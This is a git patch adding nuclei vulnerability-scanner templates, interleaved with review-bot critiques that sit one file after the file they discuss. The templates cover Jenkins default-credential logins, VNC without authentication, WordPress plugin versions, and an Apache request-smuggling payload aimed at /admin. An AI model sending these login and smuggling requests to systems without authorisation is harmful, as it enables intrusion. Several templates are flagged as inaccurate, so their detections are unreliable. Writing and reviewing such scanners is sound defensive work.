From dd17764b7d6feaf8133f1a61616f9d521c846757 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Sun, 15 Sep 2024 12:36:35 +0000 Subject: [PATCH] 20240915 --- date.txt | 2 +- poc.txt | 23 + poc/auth/jenkins-weak-password.yaml | 79 +-- poc/auth/noauth-vnc.yaml | 32 ++ poc/cve/CVE-2022-3459.yaml | 59 +++ poc/cve/CVE-2023-3410.yaml | 59 +++ poc/cve/CVE-2024-34750.yaml | 40 ++ poc/cve/CVE-2024-40725.yaml | 72 +++ poc/cve/CVE-2024-43044.yaml | 38 ++ poc/cve/CVE-2024-6409.yaml | 32 ++ poc/cve/CVE-2024-6482.yaml | 59 +++ poc/cve/CVE-2024-8246.yaml | 59 +++ poc/cve/CVE-2024-8271.yaml | 59 +++ poc/cve/CVE-2024-8479.yaml | 59 +++ poc/cve/CVE-2024-8669.yaml | 59 +++ poc/cve/CVE-2024-8724.yaml | 59 +++ poc/cve/CVE-2024-8797.yaml | 59 +++ poc/cve/cve-2017-11512.yaml | 20 +- poc/cve/cve-2018-1000671.yaml | 21 +- poc/cve/cve-2018-12300.yaml | 31 +- poc/cve/cve-2018-12675.yaml | 18 +- poc/cve/cve-2018-9161.yaml | 22 +- poc/cve/cve-2019-10758.yaml | 34 +- poc/cve/cve-2020-36365.yaml | 30 +- poc/cve/cve-2021-21311.yaml | 65 ++- poc/cve/cve-2021-25111.yaml | 24 +- poc/cve/cve-2022-0149.yaml | 27 +- poc/cve/cve-2022-27849.yaml | 20 +- poc/detect/hipcam-detect.yaml | 50 ++ poc/detect/rockwell-plc-detect.yaml | 234 +++++++++ poc/detect/wowza-streaming-detect.yaml | 6 +- poc/exposed/frontpage-exposure.yaml | 34 ++ poc/java/jboss-web-console.yaml | 42 +- poc/jenkins/jenkins-weak-password.yaml | 79 +-- ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 +- poc/other/Dahua_getUserInfoByUserName.yaml | 18 +- poc/other/gavazzi-automation.yaml | 87 ++++ poc/other/intank-iiot.yaml | 43 ++ poc/other/siemens-simatic.yaml | 34 ++ .../woocommerce-multiple-free-gift.yaml | 59 +++ poc/sql/mass-sqli.yaml | 476 ++++++++++++++++++ poc/sql_injection/mass-sqli.yaml | 476 ++++++++++++++++++ poc/upload/Dahua_Video_FileUpload.yaml | 42 +- ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 +- poc/web/jboss-web-console.yaml | 42 +- 45 files changed, 2688 insertions(+), 289 deletions(-) mode change 100755 => 100644 poc/auth/jenkins-weak-password.yaml create mode 100644 
poc/auth/noauth-vnc.yaml
create mode 100644 poc/cve/CVE-2022-3459.yaml
create mode 100644 poc/cve/CVE-2023-3410.yaml
create mode 100644 poc/cve/CVE-2024-34750.yaml
create mode 100644 poc/cve/CVE-2024-40725.yaml
create mode 100644 poc/cve/CVE-2024-43044.yaml
create mode 100644 poc/cve/CVE-2024-6409.yaml
create mode 100644 poc/cve/CVE-2024-6482.yaml
create mode 100644 poc/cve/CVE-2024-8246.yaml
create mode 100644 poc/cve/CVE-2024-8271.yaml
create mode 100644 poc/cve/CVE-2024-8479.yaml
create mode 100644 poc/cve/CVE-2024-8669.yaml
create mode 100644 poc/cve/CVE-2024-8724.yaml
create mode 100644 poc/cve/CVE-2024-8797.yaml
create mode 100644 poc/detect/hipcam-detect.yaml
create mode 100644 poc/detect/rockwell-plc-detect.yaml
create mode 100644 poc/exposed/frontpage-exposure.yaml
mode change 100755 => 100644 poc/java/jboss-web-console.yaml
mode change 100755 => 100644 poc/jenkins/jenkins-weak-password.yaml
create mode 100644 poc/other/gavazzi-automation.yaml
create mode 100644 poc/other/intank-iiot.yaml
create mode 100644 poc/other/siemens-simatic.yaml
create mode 100644 poc/remote_code_execution/woocommerce-multiple-free-gift.yaml
create mode 100644 poc/sql/mass-sqli.yaml
create mode 100644 poc/sql_injection/mass-sqli.yaml
mode change 100755 => 100644 poc/web/jboss-web-console.yaml
diff --git a/date.txt b/date.txt
index 84c2c89a52..5cbbe5defc 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240914
+20240915
diff --git a/poc.txt b/poc.txt
index ea3ba5bf1a..9f2ce16d60 100644
--- a/poc.txt
+++ b/poc.txt
@@ -4146,6 +4146,7 @@
 ./poc/auth/nexus-default-password.yml
 ./poc/auth/nexus-repository-unauthentication.yaml
 ./poc/auth/nifi-api-unauthorized-access.yaml
+./poc/auth/noauth-vnc.yaml
 ./poc/auth/nodered-default-login.yaml
 ./poc/auth/noescape-login.yaml
 ./poc/auth/novnc-login-panel.yaml
@@ -21024,6 +21025,7 @@
 ./poc/cve/CVE-2022-34534.yaml
 ./poc/cve/CVE-2022-34576.yaml
 ./poc/cve/CVE-2022-3459-f874164b02061f0298b7dc031fdb9eac.yaml
+./poc/cve/CVE-2022-3459.yaml
 ./poc/cve/CVE-2022-34590.yaml
 ./poc/cve/CVE-2022-3462-ccd003276e3aa019c522c97354bbeff8.yaml
 ./poc/cve/CVE-2022-3462.yaml
@@ -27402,6 +27404,7 @@
 ./poc/cve/CVE-2023-3409.yaml
 ./poc/cve/CVE-2023-34096.yaml
 ./poc/cve/CVE-2023-3410-dda648f2ccaffe250c2835aba9f08374.yaml
+./poc/cve/CVE-2023-3410.yaml
 ./poc/cve/CVE-2023-3411-4bb68b0a1ff203797dd994de340b8afb.yaml
 ./poc/cve/CVE-2023-3411.yaml
 ./poc/cve/CVE-2023-3412-3d1ceef933d1264cbbd03dc26c5b83ef.yaml
@@ -37969,6 +37972,7 @@
 ./poc/cve/CVE-2024-3474.yaml
 ./poc/cve/CVE-2024-3475-1233901f48139788794a7252044053ed.yaml
 ./poc/cve/CVE-2024-3475.yaml
+./poc/cve/CVE-2024-34750.yaml
 ./poc/cve/CVE-2024-34751-8fefb0096cfe37c29f9bcc18ed431dbb.yaml
 ./poc/cve/CVE-2024-34751.yaml
 ./poc/cve/CVE-2024-34752-a2a693489a5ca358f1243ce5d57683db.yaml
@@ -39953,6 +39957,7 @@
 ./poc/cve/CVE-2024-4057.yaml
 ./poc/cve/CVE-2024-4061-7d27faa8767de65d446af82e8cb546ee.yaml
 ./poc/cve/CVE-2024-4061.yaml
+./poc/cve/CVE-2024-40725.yaml
 ./poc/cve/CVE-2024-4077-810356fac1d68873d9e790939148b3f0.yaml
 ./poc/cve/CVE-2024-4077.yaml
 ./poc/cve/CVE-2024-4082-50825b3df742f81debb8f24874dd3aa4.yaml
@@ -40107,6 +40112,7 @@
 ./poc/cve/CVE-2024-4290.yaml
 ./poc/cve/CVE-2024-4295-f887ea45b60e88fcf428c70a1901be12.yaml
 ./poc/cve/CVE-2024-4295.yaml
+./poc/cve/CVE-2024-43044.yaml
 ./poc/cve/CVE-2024-4305-637eadcd24b75860f6993f7f01fc3e2a.yaml
 ./poc/cve/CVE-2024-4305.yaml
 ./poc/cve/CVE-2024-43116-41d711f6515b000671ba62e9e183e8b2.yaml
@@ -42138,6 +42144,7 @@
 ./poc/cve/CVE-2024-6405.yaml
 ./poc/cve/CVE-2024-6408-313f9e2ba0a4ee6e8c1c902f6f31e4dd.yaml
 ./poc/cve/CVE-2024-6408.yaml
+./poc/cve/CVE-2024-6409.yaml
 ./poc/cve/CVE-2024-6410-e0557d736e6d7ba9354551c87bc46975.yaml
 ./poc/cve/CVE-2024-6410.yaml
 ./poc/cve/CVE-2024-6411-78a7b3d7c96c66a5618e0f92b6cf3978.yaml
@@ -42178,6 +42185,7 @@
 ./poc/cve/CVE-2024-6481-8bb84297d1313840ad504743c863bb15.yaml
 ./poc/cve/CVE-2024-6481.yaml
 ./poc/cve/CVE-2024-6482-577fd97d26b95e756263126ef60c6a37.yaml
+./poc/cve/CVE-2024-6482.yaml
 ./poc/cve/CVE-2024-6487-af8f4fe7694bfc08570956a253ee5369.yaml
 ./poc/cve/CVE-2024-6487.yaml
 ./poc/cve/CVE-2024-6489-bc7ee27fc8cd45d366588f7c757a9c55.yaml
@@ -42823,6 +42831,7 @@
 ./poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml
 ./poc/cve/CVE-2024-8242.yaml
 ./poc/cve/CVE-2024-8246-902383001b6a5bc20eed5f0cb307c0ed.yaml
+./poc/cve/CVE-2024-8246.yaml
 ./poc/cve/CVE-2024-8247-7ddc0c06e971c1cf25a0f3f37508e6b0.yaml
 ./poc/cve/CVE-2024-8247.yaml
 ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml
@@ -42834,6 +42843,7 @@
 ./poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml
 ./poc/cve/CVE-2024-8269.yaml
 ./poc/cve/CVE-2024-8271-13221a05cbda5251ef0c446e5653da53.yaml
+./poc/cve/CVE-2024-8271.yaml
 ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml
 ./poc/cve/CVE-2024-8274.yaml
 ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml
@@ -42866,6 +42876,7 @@
 ./poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml
 ./poc/cve/CVE-2024-8478.yaml
 ./poc/cve/CVE-2024-8479-1ca994835b1b496ace2cec8e13acae4d.yaml
+./poc/cve/CVE-2024-8479.yaml
 ./poc/cve/CVE-2024-8480-f1d8d42bfc1633b849f4ef6346a133c9.yaml
 ./poc/cve/CVE-2024-8480.yaml
 ./poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml
@@ -42887,9 +42898,11 @@
 ./poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml
 ./poc/cve/CVE-2024-8665.yaml
 ./poc/cve/CVE-2024-8669-48017cad1d0f5431615877a08826da9a.yaml
+./poc/cve/CVE-2024-8669.yaml
 ./poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml
 ./poc/cve/CVE-2024-8714.yaml
 ./poc/cve/CVE-2024-8724-9019a55c2cb51d14586e3502543ceb09.yaml
+./poc/cve/CVE-2024-8724.yaml
 ./poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml
 ./poc/cve/CVE-2024-8730.yaml
 ./poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml
@@ -42905,6 +42918,7 @@
 ./poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml
 ./poc/cve/CVE-2024-8747.yaml
 ./poc/cve/CVE-2024-8797-c59dee142d9f249969c44faf56beb682.yaml
+./poc/cve/CVE-2024-8797.yaml
 ./poc/cve/CVE_2023_49442.yaml
 ./poc/cve/CVE_2023_51467.yaml
 ./poc/cve/CVE_2024_0195.yaml
@@ -52490,6 +52504,7 @@
 ./poc/detect/hikvision-detection-7954.yaml
 ./poc/detect/hikvision-detection-7955.yaml
 ./poc/detect/hikvision-detection.yaml
+./poc/detect/hipcam-detect.yaml
 ./poc/detect/home-assistant-detect.yaml
 ./poc/detect/hp-blade-admin-detect-8003.yaml
 ./poc/detect/hp-blade-admin-detect-8004.yaml
@@ -53036,6 +53051,7 @@
 ./poc/detect/rhymix-cms-detect-9879.yaml
 ./poc/detect/rhymix-cms-detect.yaml
 ./poc/detect/riak-detect.yaml
+./poc/detect/rockwell-plc-detect.yaml
 ./poc/detect/room-alert-detect.yaml
 ./poc/detect/rosariosis-detect.yaml
 ./poc/detect/routeros-version-detect.yaml
@@ -54601,6 +54617,7 @@
 ./poc/exposed/flink-exposure-7511.yaml
 ./poc/exposed/flink-exposure.yaml
 ./poc/exposed/forgejo-repo-exposure.yaml
+./poc/exposed/frontpage-exposure.yaml
 ./poc/exposed/ftp-credentials-exposure-7567.yaml
 ./poc/exposed/ftp-credentials-exposure-7568.yaml
 ./poc/exposed/ftp-credentials-exposure.yaml
@@ -75102,6 +75119,7 @@
 ./poc/other/garmin-connect.yaml
 ./poc/other/gate-one.yaml
 ./poc/other/gateone-workflow.yaml
+./poc/other/gavazzi-automation.yaml
 ./poc/other/gb-gallery-slideshow-00a9466671a0e69d0aedfaee9145654e.yaml
 ./poc/other/gb-gallery-slideshow.yaml
 ./poc/other/gc-testimonials-51b93fe3d2a5697bc6c0c88b51bb094c.yaml
@@ -77306,6 +77324,7 @@
 ./poc/other/institutions-directory-05c9e1ca16738cd78fe38ca1f2073848.yaml
 ./poc/other/institutions-directory.yaml
 ./poc/other/instructables.yaml
+./poc/other/intank-iiot.yaml
 ./poc/other/integracao-rd-station-198030404c9ce55b50e42f8d3447992c.yaml
 ./poc/other/integracao-rd-station-f273da08ce04eb7ca8ff220d5e6ae640.yaml
 ./poc/other/integracao-rd-station.yaml
@@ -87591,6 +87610,7 @@
 ./poc/other/sidekiq-dashboard.yaml
 ./poc/other/sidekiq-workflow.yaml
 ./poc/other/sidekiq.yaml
+./poc/other/siemens-simatic.yaml
 ./poc/other/sigma_wide.yaml
 ./poc/other/signal-phish.yaml
 ./poc/other/signature-verification-management-system.yaml
@@ -98799,6 +98819,7 @@
 ./poc/remote_code_execution/woocommerce-multiple-customer-addresses-e58fd6fc55781d41aa60974eac75f757.yaml
 ./poc/remote_code_execution/woocommerce-multiple-customer-addresses.yaml
 ./poc/remote_code_execution/woocommerce-multiple-free-gift-939e3a08a9f8b49368755587a40c875e.yaml
+./poc/remote_code_execution/woocommerce-multiple-free-gift.yaml
 ./poc/remote_code_execution/woocommerce-ninjaforms-product-addons-fe7479a6b6025e86397ca09e26459aa3.yaml
 ./poc/remote_code_execution/woocommerce-ninjaforms-product-addons.yaml
 ./poc/remote_code_execution/woocommerce-one-page-checkout-0fb2ac203a6e2b270723afe1dd3e678a.yaml
@@ -106012,6 +106033,7 @@
 ./poc/sql/marmoset-viewer-d601c9bb70361b55fc57dbc9a11ed725.yaml
 ./poc/sql/mashsharer-99c04b0c6cdb3ef571a7d8d62a6a8e40.yaml
 ./poc/sql/mass-pagesposts-creator-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/mass-sqli.yaml
 ./poc/sql/master-addons-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/master-addons-daa4129ec4b09b68fe1dbfb68e8ccb96.yaml
 ./poc/sql/master-blocks-6477bf18cad6c823db485408d49b337b.yaml
@@ -109204,6 +109226,7 @@
 ./poc/sql_injection/leaguemanager-sqli.yaml
 ./poc/sql_injection/loancms-sqli.yaml
 ./poc/sql_injection/magicflow-sqli.yaml
+./poc/sql_injection/mass-sqli.yaml
 ./poc/sql_injection/material-dashboard-2-by-creative-sql-injection.yaml
 ./poc/sql_injection/maticsoft-shop-sqli.yaml
 ./poc/sql_injection/mcms-list-do-sqli.yaml
diff --git a/poc/auth/jenkins-weak-password.yaml b/poc/auth/jenkins-weak-password.yaml
old mode 100755
new mode 100644
index 84d3b8f678..08508605ce
--- a/poc/auth/jenkins-weak-password.yaml
+++ b/poc/auth/jenkins-weak-password.yaml
@@ -1,45 +1,52 @@ id: jenkins-weak-password info: name: Jenkins Default Login - author: - - l0ne1y - tags: - - jenkins - - default-login - description: |- - Jenkins 默认口令登录漏洞 - CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Audit Trail Plugin是使用在其中的一个审核日志记录插件。其管理后台存在默认账户admin/admin,攻击者可通过默认账户登录后台实施高危操作。 + author: Zandros0 severity: high + tags: jenkins,default-login + description: Jenkins default admin login information was discovered. classification: - cwe-id: - - cwe-522 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - remediation: |- - 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 - 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 - 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 - 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) - 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) + cve-id: + cwe-id: CWE-522 requests: -- matchers: - - type: dsl - condition: and - dsl: - - contains(body_3, "/logout") - - contains(body_3, "Dashboard [Jenkins]") - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - | - POST /j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + - | + POST /j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: {{cookie}} - j_username=admin&j_password=admin&from=%2F&Submit=Sign+in - - | - GET / HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - req-condition: true + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: {{cookie}} + attack: pitchfork + payloads: + username: + - admin + - jenkins + password: + - admin + - password + extractors: + - type: regex + name: cookie + internal: true + part: header 
+ regex:
+ - 'JSESSIONID\..*=([a-z0-9.]+)'
+ req-condition: true
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - 'contains(body_3, "/logout")'
+ - 'contains(body_3, "Dashboard [Jenkins]")'
+
+# Enhanced by mp on 2022/03/10
diff --git a/poc/auth/noauth-vnc.yaml b/poc/auth/noauth-vnc.yaml
new file mode 100644
index 0000000000..17d83bbccf
--- /dev/null
+++ b/poc/auth/noauth-vnc.yaml
@@ -0,0 +1,32 @@
+id: exposed-vnc-no-auth
+
+info:
+ name: Exposed VNC Server No-Auth
+ author: Redflare Cyber
+ severity: high
+ description: This template checks for VNC servers that do not require authentication, which can allow unauthorized access to the system.
+ classification:
+ cwe-id: CWE-306
+ metadata:
+ max-request: 1
+ shodan-query: 'port:5900 product:"VNC"'
+ tags: network,vnc,exposed,no-auth,tcp
+
+tcp:
+ - inputs:
+ - data: "\r\n"
+ host:
+ - "{{Hostname}}"
+ port: 5900,5901,5902
+
+ matchers:
+ - type: word
+ words:
+ - "RFB"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "Authentication disabled"
+
diff --git a/poc/cve/CVE-2022-3459.yaml b/poc/cve/CVE-2022-3459.yaml
new file mode 100644
index 0000000000..c46854dfde
--- /dev/null
+++ b/poc/cve/CVE-2022-3459.yaml
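Review bot: The rewritten chain relies on `{{cookie}}` carrying the session the login response establishes, but the old `cookie-reuse: true` is dropped and the `JSESSIONID\..*=([a-z0-9.]+)` extractor has no `group`, so the whole `name=value` match is what lands in `Cookie:` — that is the right shape for the header, but it only works for request 3 if the extractor re-runs on response 2 when Jenkins rotates the session id on login, which I cannot confirm from the template; either restore `cookie-reuse: true` so the engine manages the jar, or add `# whole match on purpose: header wants name=value` above the regex. The new `description` also loses the remediation text the removed block carried; a one-line `remediation: Change the default admin credentials and enforce a password policy` keeps that value for consumers of the finding. The empty `cve-id:` under `classification` and the trailing `# Enhanced by mp on 2022/03/10` (stale for a file reworked in 2024) should go. The hunk starts at line 1, so the whole template is in view.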
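Review bot: The `RFB` word matcher only proves that the peer sent the RFB version banner, which every VNC server does, and the extractor string `Authentication disabled` is not something the RFB handshake emits as text, so this high-severity template will fire on fully authenticated servers as well. Establishing that authentication is off needs the version exchange to complete and the server's security-type list to be inspected for type 1 (None) per RFC 6143 §7.1.2, i.e. a second `inputs` step and a binary/regex matcher on that byte rather than a text extractor. Until that is implemented I would rename the finding to a VNC banner detection, lower `severity`, and leave `# TODO: matches the RFB banner only, does not verify the security type` beside the word matcher so nobody treats a hit as confirmed no-auth.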
@@ -0,0 +1,59 @@ +id: CVE-2022-3459 + +info: + name: > + WooCommerce Multiple Free Gift <= 1.2.3 - Insufficient Server-Side Validation to Arbitrary Gift Adding + author: topscoder + severity: medium + description: > + The WooCommerce Multiple Free Gift plugin for WordPress is vulnerable to gift manipulation in all versions up to, and including, 1.2.3. This is due to plugin not enforcing server-side checks on the products that can be added as a gift. This makes it possible for unauthenticated attackers to add non-gift items to their cart as a gift. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdb9c321-1a2c-4593-9947-2071a908ee1c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2022-3459 + metadata: + fofa-query: "wp-content/plugins/woocommerce-multiple-free-gift/" + google-query: inurl:"/wp-content/plugins/woocommerce-multiple-free-gift/" + shodan-query: 'vuln:CVE-2022-3459' + tags: cve,wordpress,wp-plugin,woocommerce-multiple-free-gift,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-multiple-free-gift/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-multiple-free-gift" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2023-3410.yaml b/poc/cve/CVE-2023-3410.yaml new file mode 100644 index 0000000000..65f7bf732c --- /dev/null +++ b/poc/cve/CVE-2023-3410.yaml 
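Review bot: The version gate reads `Stable tag:` from readme.txt, which plugin authors commonly leave as `trunk` or forget to bump; in that case the internal extractor yields nothing, `compare_versions(version, '<= 1.2.3')` fails silently and a vulnerable site is reported clean, so the dsl matcher deserves `# readme Stable tag may be stale or 'trunk'; absence of a match is not proof of a patched site`. The second extractor repeats the first regex verbatim and differs only in lacking `internal: true`; presumably it exists so the version is printed in output, which a comment such as `# non-internal copy so the extracted version appears in results` would make explicit and stop a later cleanup from deleting it. Every topscoder template in this commit (CVE-2023-3410, CVE-2024-6482, CVE-2024-8246, CVE-2024-8271, CVE-2024-8479, CVE-2024-8669, CVE-2024-8724) shares this structure and the same comments apply there.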
@@ -0,0 +1,59 @@ +id: CVE-2023-3410 + +info: + name: > + Bricks <= 1.10.1 - Authenticated (Bricks Page Builder Access+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Bricks theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘customTag' attribute in versions up to, and including, 1.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with access to the Bricks Builder (admin-only by default), to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This becomes more of an issue when Bricks Builder access is granted to lower-privileged users. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba5e93a2-8f42-4747-86fa-297ba709be8f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-3410 + metadata: + fofa-query: "wp-content/themes/bricks/" + google-query: inurl:"/wp-content/themes/bricks/" + shodan-query: 'vuln:CVE-2023-3410' + tags: cve,wordpress,wp-theme,bricks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/bricks/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bricks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.10.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-34750.yaml b/poc/cve/CVE-2024-34750.yaml new file mode 100644 index 0000000000..698186dc67 --- /dev/null +++ b/poc/cve/CVE-2024-34750.yaml 
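Review bot: `severity: low` in `info` contradicts the `cvss-score: 5.4` and `cvss-metrics` a few lines below, and the `low` token is echoed in `tags`; nuclei consumers filter and rank on `severity`, so the template is hidden at typical thresholds while its own classification says medium. The same mismatch recurs in this commit in CVE-2024-6482 (low vs 8.8), CVE-2024-8246 (low vs 8.8) and CVE-2024-8669 (low vs 9.1). Presumably the generator lowers severity when authentication is required; if that is deliberate, say so with `# severity downgraded: requires authenticated access` next to the field, otherwise align `severity` and the tag with the CVSS band.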
@@ -0,0 +1,40 @@ +id: CVE-2024-34750 + +info: + name: CVE-2024-34750 + author: Redflare Cyber + severity: high + description: Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed. + classification: + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: apache + product: tomcat + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" + tags: tech,tomcat,apache,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/{{randstr}}" + - "{{BaseURL}}/docs/introduction.html" + + stop-at-first-match: true + + extractors: + - type: regex + name: version + group: 1 + regex: + - '(?i)Apache Tomcat.*((11\.0\.0-M([1-9]|1[0-9]|20))|(10\.1\.0-M([1-9]|1[0-9]|2[0-4]))|(9\.0\.(0-M[1-9]|0-M1[0-9]|0-M20|[1-8][0-9]|9[0-8])))' + diff --git a/poc/cve/CVE-2024-40725.yaml b/poc/cve/CVE-2024-40725.yaml new file mode 100644 index 0000000000..7943b81d4c --- /dev/null +++ b/poc/cve/CVE-2024-40725.yaml 
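Review bot: The extractor regex is the only check in the template and it is both incomplete and unbounded: for the 9.0 branch `[1-8][0-9]|9[0-8]` covers 9.0.10–9.0.98, so 9.0.1–9.0.9 are missed while 9.0.90–9.0.98 are reported even though, as I recall the Apache advisory, the fix shipped in 9.0.90 (confirm before relying on it), and the 10.1 branch lists only `0-M` milestones and never the 10.1.0–10.1.24 releases. Nothing terminates the version either, so `9\.0\.1[0-9]` also matches inside `9.0.100`; closing the alternation with `([^0-9]|$)` fixes that, and `(?i)Apache Tomcat.*` is greedy across the whole body so any version string later in the page is attributed to the banner. Because there are no `matchers`, every extractor hit is the finding, so the regex must be exact. `name: CVE-2024-34750` should be a descriptive title and `classification` should carry `cve-id: CVE-2024-34750` as the other templates in this commit do.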
@@ -0,0 +1,72 @@ +id: CVE-2024-40725 +info: + name: Apache HTTP Server HTTP Request Smuggling (CVE-2024-40725) + author: Redflare Cyber + severity: high + description: Detects the presence of CVE-2024-40725 vulnerability in Apache HTTP Server using HTTP Request Smuggling techniques. + reference: + - https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898 + tags: cve, http-request-smuggling, apache, mod_proxy + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: header + regex: + - "Server: Apache/2\\.4\\.[0-5][0-9]" + - "Server: Apache/2\\.4\\.6[0-1]" + name: server_version + + matchers: + - type: regex + part: header + regex: + - "Server: Apache/2\\.4\\.[0-5][0-9]" + - "Server: Apache/2\\.4\\.6[0-1]" + + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Connection: Keep-Alive, Proxy-Authenticate + + matchers: + - type: regex + part: header + regex: + - "Proxy-Authenticate" + + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Length: 0 + Transfer-Encoding: chunked + + 0 + + GET /admin HTTP/1.1 + Host: {{Hostname}} + User-Agent: smuggle-test + + matchers: + - type: word + part: body + words: + - "admin" + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + regex: + - "Server: Apache/2\\.4\\.[0-5][0-9]" + - "Server: Apache/2\\.4\\.6[0-1]" + name: server_version diff --git a/poc/cve/CVE-2024-43044.yaml b/poc/cve/CVE-2024-43044.yaml new file mode 100644 index 0000000000..7fa0a9ff05 --- /dev/null +++ b/poc/cve/CVE-2024-43044.yaml 
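Review bot: The third request's `matchers` have no `matchers-condition`, so they are OR'd and a plain `200` from `/` — or any body containing the word `admin` — satisfies this high-severity template on essentially every Apache host; at minimum add `matchers-condition: and`. Even then, the response nuclei evaluates is the one to the chunked POST itself, which says nothing about whether the trailing request text was parsed, so the only evidence actually tied to the CVE is the `Server:` banner regex in the first request, and that is a version inference that misses builds which hide or backport the version; a comment beside `server_version` should say so. The `tags` value has spaces after the commas, unlike the other templates in this commit, and `classification` with `cve-id: CVE-2024-40725` is missing.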
@@ -0,0 +1,38 @@ +id: CVE-2024-43044 + +info: + name: CVE-2024-43044 + author: Redflare Cyber + reference: + - https://www.jenkins.io/security/advisory/2024-08-07/ #advisory + - https://github.com/convisolabs/CVE-2024-43044-jenkins #exploit + - https://nvd.nist.gov/vuln/detail/CVE-2024-43044 + severity: high + description: Jenkins' Remoting library enables communication between the controller and agents, allowing Java objects and plugins to be executed on agents. Vulnerabilities in versions up to 2.470 and LTS 2.452.3 allow agents and attackers with Agent/Connect permission to read arbitrary files from the controllers file system. + tags: lfr,jenkins + metadata: + shodan-query: 'product:"Jenkins"' + +requests: + - method: GET + path: + - "{{BaseURL}}/whoAmI/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'X-Jenkins:' + + 